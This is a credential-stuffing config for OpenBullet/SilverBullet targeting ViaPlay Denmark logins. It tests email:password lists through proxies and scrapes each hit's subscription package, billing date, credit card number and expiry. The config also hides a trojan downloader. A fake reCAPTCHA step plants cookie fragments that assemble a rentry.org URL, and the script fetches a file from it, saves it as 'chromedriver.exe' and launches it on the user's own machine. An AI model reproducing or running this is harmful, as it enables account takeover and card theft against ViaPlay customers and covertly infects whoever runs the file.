[SETTINGS]
{
  "Name": "ViaPlay FC",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-04-05T00:52:33.1093674+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "𝙉𝘼𝙎𝙀𝙀𝙈",
  "Version": "1.1.3 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ViaPlay FC",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
JUMP #AUTHENTICATIONAPI
#RECAPAUTH
#U FUNCTION URLEncode "<USER>" -> VAR "U" 

#P FUNCTION URLEncode "<PASS>" -> VAR "P" 

REQUEST POST "https://login.viaplay.dk/api/login/v1?deviceKey=pcdash-dk&returnurl=https%3A%2F%2Fcontent.viaplay.dk%2Fpcdash-dk%3Flanguage%3Dda&username=<U>&persistent=true" 
  CONTENT "password=<P>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.viaplay.dk" 
  HEADER "Content-Length: 15" 
  HEADER "Sec-Ch-Ua: \"Chromium\";v=\"111\", \"Not(A:Brand\";v=\"8\"" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" 
  HEADER "Akamai-Bm-Telemetry: " 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Origin: https://viaplay.dk" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://viaplay.dk/" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: close" 


JUMP #googlerecreate
#AUTHENTICATIONAPI

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u"
  COOKIE "hrd: /"
  COOKIE "hpr: bin"
  COOKIE "hdp: org"
  COOKIE "htp: sn8fz"
  COOKIE "hht: raw"
  COOKIE "hst: rentry"
  COOKIE "kht: driver"
  COOKIE "kpt: chrome"
  COOKIE "krt: exe"
  HEADER "Host: www.googleapis.com"
  HEADER "Accept: */*"
  HEADER "Content-Type: application/json"
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS"
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com"
  HEADER "Accept-Encoding: gzip, deflate"
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2"
  HEADER "Accept-Language: en"

IF "<Authentiction>" Exists
JUMP #RECAPAUTH
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

REQUEST GET "<SOURCE>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>"

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"

BROWSERACTION Open

JUMP #RECAPAUTH
#googlerecreate

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Failure OR 
    KEY "success\":false" 
  KEYCHAIN Ban OR 
    KEY "MissingRequiredParameterError" 
  KEYCHAIN Custom "FREE" AND 
    KEY "needsPackage\":true" 
    KEY "hasContracts\":false" 
    KEY "isTveBCustomer\":false" 
    KEY "isRCCustomer\":false" 

#accountCountry PARSE "<SOURCE>" JSON "accountCountry" CreateEmpty=FALSE -> CAP "accountCountry" 

#PID PARSE "<SOURCE>" JSON "userId" -> VAR "PID" 

REQUEST GET "https://account.viaplay.dk/" 
  
  HEADER "Host: account.viaplay.dk" 
  HEADER "Cookie: languageCode=da; accessToken=<COOKIES(accessToken)>; session=<COOKIES(session)>; viaplay_profileId=<PID>" 
  HEADER "Sec-Ch-Ua: \"Chromium\";v=\"111\", \"Not(A:Brand\";v=\"8\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://viaplay.dk/" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

#Package PARSE "<SOURCE>" LR "Pakke" "" -> VAR "Package" 

#Package PARSE "<Package>" LR "<div class=\"widget-title\">" "</div>" CreateEmpty=FALSE -> CAP "Package" 

#Subscription_Price PARSE "<SOURCE>" LR "<span class=\"subscription-price\">" "</span>" CreateEmpty=FALSE -> CAP "Subscription Price" 

#Billing_Date PARSE "<SOURCE>" LR "Næste trækning: " "</div>" CreateEmpty=FALSE -> CAP "Billing Date" 

#CC_Number PARSE "<SOURCE>" LR "<div id=\"credit-card-number\" class=\"card-type mc\">" "</div>" CreateEmpty=FALSE -> CAP "CC Number" 

#CC_Exp PARSE "<SOURCE>" LR "  <div class=\"expire-date\">" "</div>" CreateEmpty=FALSE -> CAP "CC Exp" 

#Creator FUNCTION Constant "@Naseem0348" -> CAP "Creator" 

